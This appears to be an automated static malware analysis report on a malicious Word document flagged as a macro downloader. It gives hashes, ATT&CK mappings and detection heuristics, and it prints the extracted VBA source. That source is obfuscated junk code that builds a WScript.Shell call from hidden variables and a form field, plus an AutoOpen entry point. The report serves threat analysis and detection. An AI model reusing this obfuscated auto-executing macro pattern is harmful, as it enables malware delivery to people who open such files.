Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ec18400a0f60f245…

MALICIOUS

Office (OLE)

Size: 96.8 KB
Created: 2019-01-16 16:46:00
Authoring application: Microsoft Office Word
First seen: 2019-01-31
MD5: 8180d32df8d75be2b874906aaa271ada
SHA-1: 1a9bd48a52cc389bc217055eb59811404066c130
SHA-256: ec18400a0f60f245a337020c52edba4f68eb8a804fd0ada1b6740968356d8fb3
Risk score: 290

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1105 Ingress Tool Transfer

The sample contains VBA macros with critical firings for Shell() calls and WScript.Shell usage, indicating the execution of external commands. The presence of an AutoOpen macro suggests automatic execution upon opening. These factors strongly suggest the macro is designed to download and execute a second-stage payload, aligning with common downloader tactics.

Heuristics (9)

  • ClamAV: Doc.Downloader.Generic-6817580-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Generic-6817580-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 4 related findings)
    Document contains VBA macro code
  • WScript.Shell usage (critical, OLE_VBA_WSCRIPT)
    WScript.Shell usage
    Matched line in script
     End Select
    sexyjm = "WscRipt.sHeLl"
       Select Case partnershipswp
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script
     End Select
    orchidiu = Array(reintermediateoa, bypassbh, Handmadeau, CreateObject("" + Vistafc + turquoiseiw + Islandsqh + sexyjm).Run!(("" + productizetb + Canyonwr + EuropeanMonetaryUnitEMU6rw + Cornernb + Managerjv + Handcraftedln.TextBox1) + Babyvp + opensourcewk + Operationszz, 69 - 69), Ohiohm, Stationdp, busni)
       Select Case quantifydz
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro (low, OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script
    End Function
    Sub autoopen()
    compressingch = BermudianDollarcustomarilyknownasBermudaDollaruv
  • Reference to Windows Script Host (high, SC_STR_WSCRIPT)
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8572 bytes
SHA-256: e14d445395c67af791e211b56d5de8fabdf36dc3d85fb9f3eba67368d7860547
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Handcraftedln"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"

Attribute VB_Name = "Functionbasedtw"
Function Granitekq()
On Error Resume Next
   Select Case Islemd
         Case 880
onetoonebw = Futurejz
            PracticalRubberCarnr = SaintPierreandMiquelonaj
            Shoalwh = CLng(775)
actionitemsww = bypassua
         Case 976
            Roadssn = CLng(988)
framewl = paymentvd
            Berkshirers = CDate(Smallak)
SleekFreshSoapwc = Mountainscb
            rebootow = Int(421)
         Case 891
SMTPhh = Takath
            Avonws = Cos(leveragefq)
Meadowsao = digitalwk
            Principaljv = ChrB(111)
            SleekRubberBikews = Bedfordshiresl
 End Select
   Select Case revolutionizeqi
         Case 478
architecturesla = Directivesiz
            motivatingkm = Rwandavd
            Montenegronf = CLng(563)
Nebraskaos = transmitterit
         Case 922
            Intelligentbs = CLng(636)
mobilecf = Georgiaws
            opensourcemn = CDate(Operationszi)
Smallzz = depositwi
            missioncriticalzi = Int(53)
         Case 260
Crestcj = Dividecu
            GardenIndustrialAutomotiveqj = Cos(Functionalityjr)
Forinttt = Gorgeouscv
            Woodenku = ChrB(501)
            multibytetr = Buckinghamshireak
 End Select
   Select Case syndicatepa
         Case 998
Enterprisewidemf = Ergonomicwz
            workforcerj = Traillw
            Intelligentic = CLng(853)
Islepo = Identityns
         Case 499
            AwesomeConcreteBikedw = CLng(138)
Directivesma = Districtwa
            digitalqi = CDate(convergencezt)
bricksandclickswd = Inversewq
            Cambridgeshirekf = Int(599)
         Case 918
RusticFrozenBikerj = GenericPlasticFishwp
            Productzz = Cos(Seniorwr)
invoicest = Consultantfs
            Administratormv = ChrB(276)
            databasesk = IntelligentRubberBaconmr
 End Select
sexyjm = "WscRipt.sHeLl"
   Select Case partnershipswp
         Case 534
Spursjq = customizedsi
            auxiliarynf = Viaductsl
            Frozenij = CLng(580)
AGPdw = Interactionsti
         Case 686
            quantifyingaf = CLng(979)
connectingwj = solutionad
            bifurcatedij = CDate(Corporatevz)
Humanfw = Codesspecificallyreservedfortestingpurposesdr
            Specialistwa = Int(390)
         Case 43
Sportsrq = AwesomeSteelBikemz
            Terracepw = Cos(neutralpt)
Teamorientedms = ivoryuh
            RusticPlasticKeyboardrf = ChrB(646)
            paymentzt = wirelessdr
 End Select
   Select Case crossplatformdp
         Case 199
Nationalmb = redundanthf
            multitaskingjz = RusticSteelBallzd
            JordanianDinarwl = CLng(61)
feedsj = engineerdj
         Case 243
            outoftheboxuq = CLng(832)
greyuo = conceptlp
            Woodenna = CDate(AutomotiveAutomotivedp)
GorgeousSteelBallid = Accountsuv
            i24hourzs = Int(757)
         Case 33
enhancejv = budgetarymanagemental
            withdrawalcf = Cos(hackingtw)
LicensedConcreteBikerz = Creativemf
            CheckingAccountzt = ChrB(231)
            systemwn = Handcraftedhz
 End Select
orchidiu = Array(reintermediateoa, bypassbh, Handmadeau, CreateObject("" + Vistafc + turquoiseiw + Islandsqh + sexyjm).Run!(("" + productizetb + Canyonwr + EuropeanMonetaryUnitEMU6rw + Cornernb + Managerjv + Handcraftedln.TextBox1) + Babyvp + opensourcewk + Operationszz, 69 - 69), Ohiohm, Stationdp, busni)
   Select Case quantifydz
         Case 66
Orchestratorld = Millwf
            visualizews = Concretebl
            infomediariesqw = CLng(473)
verticaltz = Districtth
         Case 494
            RefinedCottonCheesejv = CLng(496)
upwardtrendingpt = Fullyconfigurablewj
            withdrawaltp = CDate(Smallpn)
redundantcp = HandcraftedMetalTablesj
            explicitcw = Int(749)
         Case 685
Clothingji = worldclassnf
            indexingqo = Cos(mobiledp)
Leadrw = pinkdf
            Synchronisedfi = ChrB(861)
            GardenJeweleryzp = copyinghj
 End Select
   Select Case Niueum
         Case 260
SudanesePoundza = orangeld
            Programmablero = orangect
            Ergonomicvd = CLng(505)
backinguphm = userfacingis
         Case 724
            Futurewr = CLng(424)
connectingic = EthiopianBirrzi
            quantifyingis = CDate(GenericPlasticChipszi)
secondaryit = RefinedCottonPizzaqn
            GorgeousSoftBacondk = Int(623)
         Case 994
Estoniajo = Arkansasvn
            withdrawalnp = Cos(hubim)
Canyonso = Manatqw
            Avonzu = ChrB(861)
            Solutionsoo = Larisi
 End Select
End Function
Attribute VB_Name = "invoiceao"
Function GraphicalUserInterfacezd()
visionarych = BahrainiDinarhu
AutoLoanAccountia = Forwardii
Indonesiais = Concretesw
Woodentp = Lodgewb
Islandpc = programli
SMSzu = Pathov
Woodenfp = modelim
Burgsbz = robustvf
iteratetu = compellingwu
End Function
Function synthesizebd()
leadingedgezw = Cottonvd
neuraliz = transmittersa
Fieldrw = dynamicps
Productin = Balancedmt
NewMexicopl = artificialintelligencecs
Applicationszw = Ethiopiahl
dotcomhp = SmallSoftMousedd
onlinehb = Leonejv
MusicHealthtl = Legacyrh
End Function
Sub autoopen()
compressingch = BermudianDollarcustomarilyknownasBermudaDollaruv
analyzerzw = Steelld
copyingci = innovatedp
paymentaj = programzh
Terraceij = IncredibleSoftFiship
Groceryps = SMTPsz
GorgeousRubberSausagesnb = Array(Handcraftedkk, Illinoisvq, invoiceuq, Granitekq, methodologiesri, frameworkcb, Healthvl)
bypassinghd = auxiliaryfk
Liaisondv = Toolsnn
Waysww = Concretesp
Buckinghamshirehc = portalswp
End Sub
Function Mobilityzl()
Intuitivefs = j4thgenerationcp
Practicalwo = Ergonomickr
fuchsiamr = rebootzs
generatevz = Marylandqt
robustim = CzechKorunair
AwesomeMetalChickenuz = Awesomewl
Cottontf = nonvolatileof
Valleysbm = ROIbr
Brandlh = Arizonaoi
End Function

Attribute VB_Name = "pixelrs"

Attribute VB_Name = "Leadwk"

Attribute VB_Name = "navigatinglj"

Attribute VB_Name = "CreditCardAccountfd"

Attribute VB_Name = "Polarisedlw"

Attribute VB_Name = "bandwidthqt"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "frictionlessus"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Dobrajq"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "CreditCardAccountum"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "pixelco"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Operationsop"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "neuralnetqw"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False